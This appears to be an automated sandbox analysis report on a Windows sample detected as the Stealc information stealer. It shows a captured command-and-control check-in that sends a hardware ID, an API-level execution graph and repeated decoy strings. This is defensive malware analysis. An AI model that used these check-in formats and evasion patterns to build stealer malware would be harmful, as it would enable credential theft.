                                  Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 39 32 34 36 38 35 34 31 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 2d 2d 0d 0a
                                  Data Ascii: ------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="hwid"F892468541661964116302------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="build"tale------CGIDGCGIEGDGDGDGHJKK--
                                   Oct 30, 2024 08:22:06.290826082 CET | 210 | IN | HTTP/1.1 200 OK
                                  Date: Wed, 30 Oct 2024 07:22:06 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Target ID:0
                                  Start time:03:22:00
                                  Start date:30/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x360000
                                  File size:2'104'320 bytes
                                  MD5 hash:08C45770FB113A8CC6EABCF3EB588CA6
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2057789916.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:3.1%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:2.9%
                                    Total number of Nodes:1327
                                    Total number of Limit Nodes:24
                                    execution_graph: [interactive execution graph; the rendered node and edge dump (function addresses with their API calls, beginning at function 376c90) is omitted here]
38577->38580 38578->38577 38579->38580 38581 37a7b2 38580->38581 38582 37a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38580->38582 38583 37a7ec 38581->38583 38584 37a7bb GetProcAddress GetProcAddress 38581->38584 38582->38581 38585 37a825 38583->38585 38586 37a7f5 GetProcAddress GetProcAddress 38583->38586 38584->38583 38587 37a922 38585->38587 38588 37a832 10 API calls 38585->38588 38586->38585 38589 37a98d 38587->38589 38590 37a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38587->38590 38588->38587 38591 37a996 GetProcAddress 38589->38591 38592 37a9ae 38589->38592 38590->38589 38591->38592 38593 37a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38592->38593 38594 375ef3 38592->38594 38593->38594 38595 361590 38594->38595 38865 3616b0 38595->38865 38598 37aab0 lstrcpy 38599 3615b5 38598->38599 38600 37aab0 lstrcpy 38599->38600 38601 3615c7 38600->38601 38602 37aab0 lstrcpy 38601->38602 38603 3615d9 38602->38603 38604 37aab0 lstrcpy 38603->38604 38605 361663 38604->38605 38606 375760 38605->38606 38607 375771 38606->38607 38608 37ab30 2 API calls 38607->38608 38609 37577e 38608->38609 38610 37ab30 2 API calls 38609->38610 38611 37578b 38610->38611 38612 37ab30 2 API calls 38611->38612 38613 375798 38612->38613 38614 37aa50 lstrcpy 38613->38614 38615 3757a5 38614->38615 38616 37aa50 lstrcpy 38615->38616 38617 3757b2 38616->38617 38618 37aa50 lstrcpy 38617->38618 38619 3757bf 38618->38619 38620 37aa50 lstrcpy 38619->38620 38659 3757cc 38620->38659 38621 361590 lstrcpy 38621->38659 38622 375893 StrCmpCA 38622->38659 38623 3758f0 StrCmpCA 38624 375a2c 38623->38624 38623->38659 38625 37abb0 lstrcpy 38624->38625 38626 375a38 38625->38626 38629 37ab30 2 API calls 38626->38629 38627 37aa50 lstrcpy 38627->38659 38628 37ab30 lstrlen lstrcpy 38628->38659 38630 375a46 38629->38630 38632 37ab30 2 API calls 38630->38632 38631 375aa6 StrCmpCA 38633 375be1 38631->38633 38631->38659 38634 375a55 38632->38634 
38635 37abb0 lstrcpy 38633->38635 38636 3616b0 lstrcpy 38634->38636 38637 375bed 38635->38637 38656 375a61 38636->38656 38638 37ab30 2 API calls 38637->38638 38639 375bfb 38638->38639 38641 37ab30 2 API calls 38639->38641 38640 375c5b StrCmpCA 38642 375c66 Sleep 38640->38642 38643 375c78 38640->38643 38644 375c0a 38641->38644 38642->38659 38645 37abb0 lstrcpy 38643->38645 38646 3616b0 lstrcpy 38644->38646 38647 375c84 38645->38647 38646->38656 38648 37ab30 2 API calls 38647->38648 38649 375c93 38648->38649 38652 37ab30 2 API calls 38649->38652 38650 375510 25 API calls 38650->38659 38651 375440 20 API calls 38651->38659 38654 375ca2 38652->38654 38653 3759da StrCmpCA 38653->38659 38655 3616b0 lstrcpy 38654->38655 38655->38656 38656->37713 38657 375b8f StrCmpCA 38657->38659 38658 37aab0 lstrcpy 38658->38659 38659->38621 38659->38622 38659->38623 38659->38627 38659->38628 38659->38631 38659->38640 38659->38650 38659->38651 38659->38653 38659->38657 38659->38658 38660 37abb0 lstrcpy 38659->38660 38660->38659 38662 3776e3 GetVolumeInformationA 38661->38662 38663 3776dc 38661->38663 38664 377721 38662->38664 38663->38662 38665 37778c GetProcessHeap RtlAllocateHeap 38664->38665 38666 3777a9 38665->38666 38667 3777b8 wsprintfA 38665->38667 38669 37aa50 lstrcpy 38666->38669 38668 37aa50 lstrcpy 38667->38668 38670 375ff7 38668->38670 38669->38670 38670->37734 38672 37aab0 lstrcpy 38671->38672 38673 3648e9 38672->38673 38874 364800 38673->38874 38675 3648f5 38676 37aa50 lstrcpy 38675->38676 38677 364927 38676->38677 38678 37aa50 lstrcpy 38677->38678 38679 364934 38678->38679 38680 37aa50 lstrcpy 38679->38680 38681 364941 38680->38681 38682 37aa50 lstrcpy 38681->38682 38683 36494e 38682->38683 38684 37aa50 lstrcpy 38683->38684 38685 36495b InternetOpenA StrCmpCA 38684->38685 38686 364994 38685->38686 38687 364f1b InternetCloseHandle 38686->38687 38880 378cf0 38686->38880 38689 364f38 38687->38689 38895 36a210 CryptStringToBinaryA 38689->38895 38690 3649b3 38888 37ac30 
38690->38888 38693 3649c6 38695 37abb0 lstrcpy 38693->38695 38700 3649cf 38695->38700 38696 37ab30 2 API calls 38697 364f55 38696->38697 38698 37acc0 4 API calls 38697->38698 38701 364f6b 38698->38701 38699 364f77 ctype 38703 37aab0 lstrcpy 38699->38703 38704 37acc0 4 API calls 38700->38704 38702 37abb0 lstrcpy 38701->38702 38702->38699 38712 364fa7 38703->38712 38705 3649f9 38704->38705 38706 37abb0 lstrcpy 38705->38706 38707 364a02 38706->38707 38708 37acc0 4 API calls 38707->38708 38709 364a21 38708->38709 38710 37abb0 lstrcpy 38709->38710 38711 364a2a 38710->38711 38713 37ac30 3 API calls 38711->38713 38712->37737 38714 364a48 38713->38714 38715 37abb0 lstrcpy 38714->38715 38716 364a51 38715->38716 38717 37acc0 4 API calls 38716->38717 38718 364a70 38717->38718 38719 37abb0 lstrcpy 38718->38719 38720 364a79 38719->38720 38721 37acc0 4 API calls 38720->38721 38722 364a98 38721->38722 38723 37abb0 lstrcpy 38722->38723 38724 364aa1 38723->38724 38725 37acc0 4 API calls 38724->38725 38726 364acd 38725->38726 38727 37ac30 3 API calls 38726->38727 38728 364ad4 38727->38728 38729 37abb0 lstrcpy 38728->38729 38730 364add 38729->38730 38731 364af3 InternetConnectA 38730->38731 38731->38687 38732 364b23 HttpOpenRequestA 38731->38732 38734 364f0e InternetCloseHandle 38732->38734 38735 364b78 38732->38735 38734->38687 38736 37acc0 4 API calls 38735->38736 38737 364b8c 38736->38737 38738 37abb0 lstrcpy 38737->38738 38739 364b95 38738->38739 38740 37ac30 3 API calls 38739->38740 38741 364bb3 38740->38741 38742 37abb0 lstrcpy 38741->38742 38743 364bbc 38742->38743 38744 37acc0 4 API calls 38743->38744 38745 364bdb 38744->38745 38746 37abb0 lstrcpy 38745->38746 38747 364be4 38746->38747 38748 37acc0 4 API calls 38747->38748 38749 364c05 38748->38749 38750 37abb0 lstrcpy 38749->38750 38751 364c0e 38750->38751 38752 37acc0 4 API calls 38751->38752 38753 364c2e 38752->38753 38754 37abb0 lstrcpy 38753->38754 38755 364c37 38754->38755 38756 37acc0 4 API calls 38755->38756 38757 
364c56 38756->38757 38758 37abb0 lstrcpy 38757->38758 38759 364c5f 38758->38759 38760 37ac30 3 API calls 38759->38760 38761 364c7d 38760->38761 38762 37abb0 lstrcpy 38761->38762 38763 364c86 38762->38763 38764 37acc0 4 API calls 38763->38764 38765 364ca5 38764->38765 38766 37abb0 lstrcpy 38765->38766 38767 364cae 38766->38767 38768 37acc0 4 API calls 38767->38768 38769 364ccd 38768->38769 38770 37abb0 lstrcpy 38769->38770 38771 364cd6 38770->38771 38772 37ac30 3 API calls 38771->38772 38773 364cf4 38772->38773 38774 37abb0 lstrcpy 38773->38774 38775 364cfd 38774->38775 38776 37acc0 4 API calls 38775->38776 38777 364d1c 38776->38777 38778 37abb0 lstrcpy 38777->38778 38779 364d25 38778->38779 38780 37acc0 4 API calls 38779->38780 38781 364d46 38780->38781 38782 37abb0 lstrcpy 38781->38782 38783 364d4f 38782->38783 38784 37acc0 4 API calls 38783->38784 38785 364d6f 38784->38785 38786 37abb0 lstrcpy 38785->38786 38787 364d78 38786->38787 38788 37acc0 4 API calls 38787->38788 38789 364d97 38788->38789 38790 37abb0 lstrcpy 38789->38790 38791 364da0 38790->38791 38792 37ac30 3 API calls 38791->38792 38793 364dbe 38792->38793 38794 37abb0 lstrcpy 38793->38794 38795 364dc7 38794->38795 38796 37aa50 lstrcpy 38795->38796 38797 364de2 38796->38797 38798 37ac30 3 API calls 38797->38798 38799 364e03 38798->38799 38800 37ac30 3 API calls 38799->38800 38801 364e0a 38800->38801 38802 37abb0 lstrcpy 38801->38802 38803 364e16 38802->38803 38804 364e37 lstrlen 38803->38804 38805 364e4a 38804->38805 38806 364e53 lstrlen 38805->38806 38894 37ade0 38806->38894 38808 364e63 HttpSendRequestA 38809 364e82 InternetReadFile 38808->38809 38810 364eb7 InternetCloseHandle 38809->38810 38815 364eae 38809->38815 38813 37ab10 38810->38813 38812 37acc0 4 API calls 38812->38815 38813->38734 38814 37abb0 lstrcpy 38814->38815 38815->38809 38815->38810 38815->38812 38815->38814 38901 37ade0 38816->38901 38818 371a14 StrCmpCA 38819 371a1f ExitProcess 38818->38819 38820 371a27 38818->38820 38821 371c12 
38820->38821 38822 371b1f StrCmpCA 38820->38822 38823 371afd StrCmpCA 38820->38823 38824 371b63 StrCmpCA 38820->38824 38825 371b82 StrCmpCA 38820->38825 38826 371b41 StrCmpCA 38820->38826 38827 371ba1 StrCmpCA 38820->38827 38828 371bc0 StrCmpCA 38820->38828 38829 371acf StrCmpCA 38820->38829 38830 371aad StrCmpCA 38820->38830 38831 37ab30 lstrlen lstrcpy 38820->38831 38821->37739 38822->38820 38823->38820 38824->38820 38825->38820 38826->38820 38827->38820 38828->38820 38829->38820 38830->38820 38831->38820 38832->37745 38833->37747 38834->37753 38835->37755 38836->37761 38837->37763 38838->37767 38839->37771 38840->37775 38841->37781 38842->37783 38843->37787 38844->37801 38845->37805 38846->37804 38847->37800 38848->37804 38849->37822 38850->37807 38851->37809 38852->37813 38853->37818 38854->37819 38855->37825 38856->37832 38857->37834 38858->37857 38859->37861 38860->37862 38861->37858 38862->37862 38863->37871 38866 37aab0 lstrcpy 38865->38866 38867 3616c3 38866->38867 38868 37aab0 lstrcpy 38867->38868 38869 3616d5 38868->38869 38870 37aab0 lstrcpy 38869->38870 38871 3616e7 38870->38871 38872 37aab0 lstrcpy 38871->38872 38873 3615a3 38872->38873 38873->38598 38875 364816 38874->38875 38876 364888 lstrlen 38875->38876 38900 37ade0 38876->38900 38878 364898 InternetCrackUrlA 38879 3648b7 38878->38879 38879->38675 38881 37aa50 lstrcpy 38880->38881 38882 378d04 38881->38882 38883 37aa50 lstrcpy 38882->38883 38884 378d12 GetSystemTime 38883->38884 38885 378d29 38884->38885 38886 37aab0 lstrcpy 38885->38886 38887 378d8c 38886->38887 38887->38690 38889 37ac41 38888->38889 38890 37ac98 38889->38890 38892 37ac78 lstrcpy lstrcat 38889->38892 38891 37aab0 lstrcpy 38890->38891 38893 37aca4 38891->38893 38892->38890 38893->38693 38894->38808 38896 364f3e 38895->38896 38897 36a249 LocalAlloc 38895->38897 38896->38696 38896->38699 38897->38896 38898 36a264 CryptStringToBinaryA 38897->38898 38898->38896 38899 36a289 LocalFree 38898->38899 38899->38896 38900->38878 38901->38818

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 379bb0-379bc4 call 379aa0 663 379de3-379e42 LoadLibraryA * 5 660->663 664 379bca-379dde call 379ad0 GetProcAddress * 21 660->664 666 379e44-379e58 GetProcAddress 663->666 667 379e5d-379e64 663->667 664->663 666->667 669 379e96-379e9d 667->669 670 379e66-379e91 GetProcAddress * 2 667->670 671 379e9f-379eb3 GetProcAddress 669->671 672 379eb8-379ebf 669->672 670->669 671->672 673 379ec1-379ed4 GetProcAddress 672->673 674 379ed9-379ee0 672->674 673->674 675 379ee2-379f0c GetProcAddress * 2 674->675 676 379f11-379f12 674->676 675->676
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00F306F0), ref: 00379BF1
                                    • GetProcAddress.KERNEL32(75900000,00F30648), ref: 00379C0A
                                    • GetProcAddress.KERNEL32(75900000,00F30840), ref: 00379C22
                                    • GetProcAddress.KERNEL32(75900000,00F30570), ref: 00379C3A
                                    • GetProcAddress.KERNEL32(75900000,00F30588), ref: 00379C53
                                    • GetProcAddress.KERNEL32(75900000,00F38AA0), ref: 00379C6B
                                    • GetProcAddress.KERNEL32(75900000,00F264E0), ref: 00379C83
                                    • GetProcAddress.KERNEL32(75900000,00F26280), ref: 00379C9C
                                    • GetProcAddress.KERNEL32(75900000,00F305A0), ref: 00379CB4
                                    • GetProcAddress.KERNEL32(75900000,00F30690), ref: 00379CCC
                                    • GetProcAddress.KERNEL32(75900000,00F305B8), ref: 00379CE5
                                    • GetProcAddress.KERNEL32(75900000,00F305D0), ref: 00379CFD
                                    • GetProcAddress.KERNEL32(75900000,00F26660), ref: 00379D15
                                    • GetProcAddress.KERNEL32(75900000,00F30708), ref: 00379D2E
                                    • GetProcAddress.KERNEL32(75900000,00F305E8), ref: 00379D46
                                    • GetProcAddress.KERNEL32(75900000,00F26520), ref: 00379D5E
                                    • GetProcAddress.KERNEL32(75900000,00F30600), ref: 00379D77
                                    • GetProcAddress.KERNEL32(75900000,00F308D0), ref: 00379D8F
                                    • GetProcAddress.KERNEL32(75900000,00F26300), ref: 00379DA7
                                    • GetProcAddress.KERNEL32(75900000,00F308E8), ref: 00379DC0
                                    • GetProcAddress.KERNEL32(75900000,00F26540), ref: 00379DD8
                                    • LoadLibraryA.KERNEL32(00F308A0,?,00376CA0), ref: 00379DEA
                                    • LoadLibraryA.KERNEL32(00F30888,?,00376CA0), ref: 00379DFB
                                    • LoadLibraryA.KERNEL32(00F308B8,?,00376CA0), ref: 00379E0D
                                    • LoadLibraryA.KERNEL32(00F30900,?,00376CA0), ref: 00379E1F
                                    • LoadLibraryA.KERNEL32(00F30918,?,00376CA0), ref: 00379E30
                                    • GetProcAddress.KERNEL32(75070000,00F30858), ref: 00379E52
                                    • GetProcAddress.KERNEL32(75FD0000,00F30870), ref: 00379E73
                                    • GetProcAddress.KERNEL32(75FD0000,00F38CA0), ref: 00379E8B
                                    • GetProcAddress.KERNEL32(75A50000,00F38E68), ref: 00379EAD
                                    • GetProcAddress.KERNEL32(74E50000,00F26460), ref: 00379ECE
                                    • GetProcAddress.KERNEL32(76E80000,00F38A90), ref: 00379EEF
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00379F06
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00379EFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 500fa5f346fc56c3dd6b8ce99ed37eb4ba5d5f7d72f7c6bb63169efa5686bb50
                                    • Instruction ID: c425959363f13a9fc1f38a5c7330f015a0a1b1de1fe3a2c785f036a890f7842d
                                    • Opcode Fuzzy Hash: 500fa5f346fc56c3dd6b8ce99ed37eb4ba5d5f7d72f7c6bb63169efa5686bb50
                                    • Instruction Fuzzy Hash: 09A1FEF6518204AFC364DFA9EC88A5677EBE74D701714B61AB909C3A70D734A640DFE0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 364610-3646e5 RtlAllocateHeap 781 3646f0-3646f6 764->781 782 36479f-3647f9 VirtualProtect 781->782 783 3646fc-36479a 781->783 783->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0036465E
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003647EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364707
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646C8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003647CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003647AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646BD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036478F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003647C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646D3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003647B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364638
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist 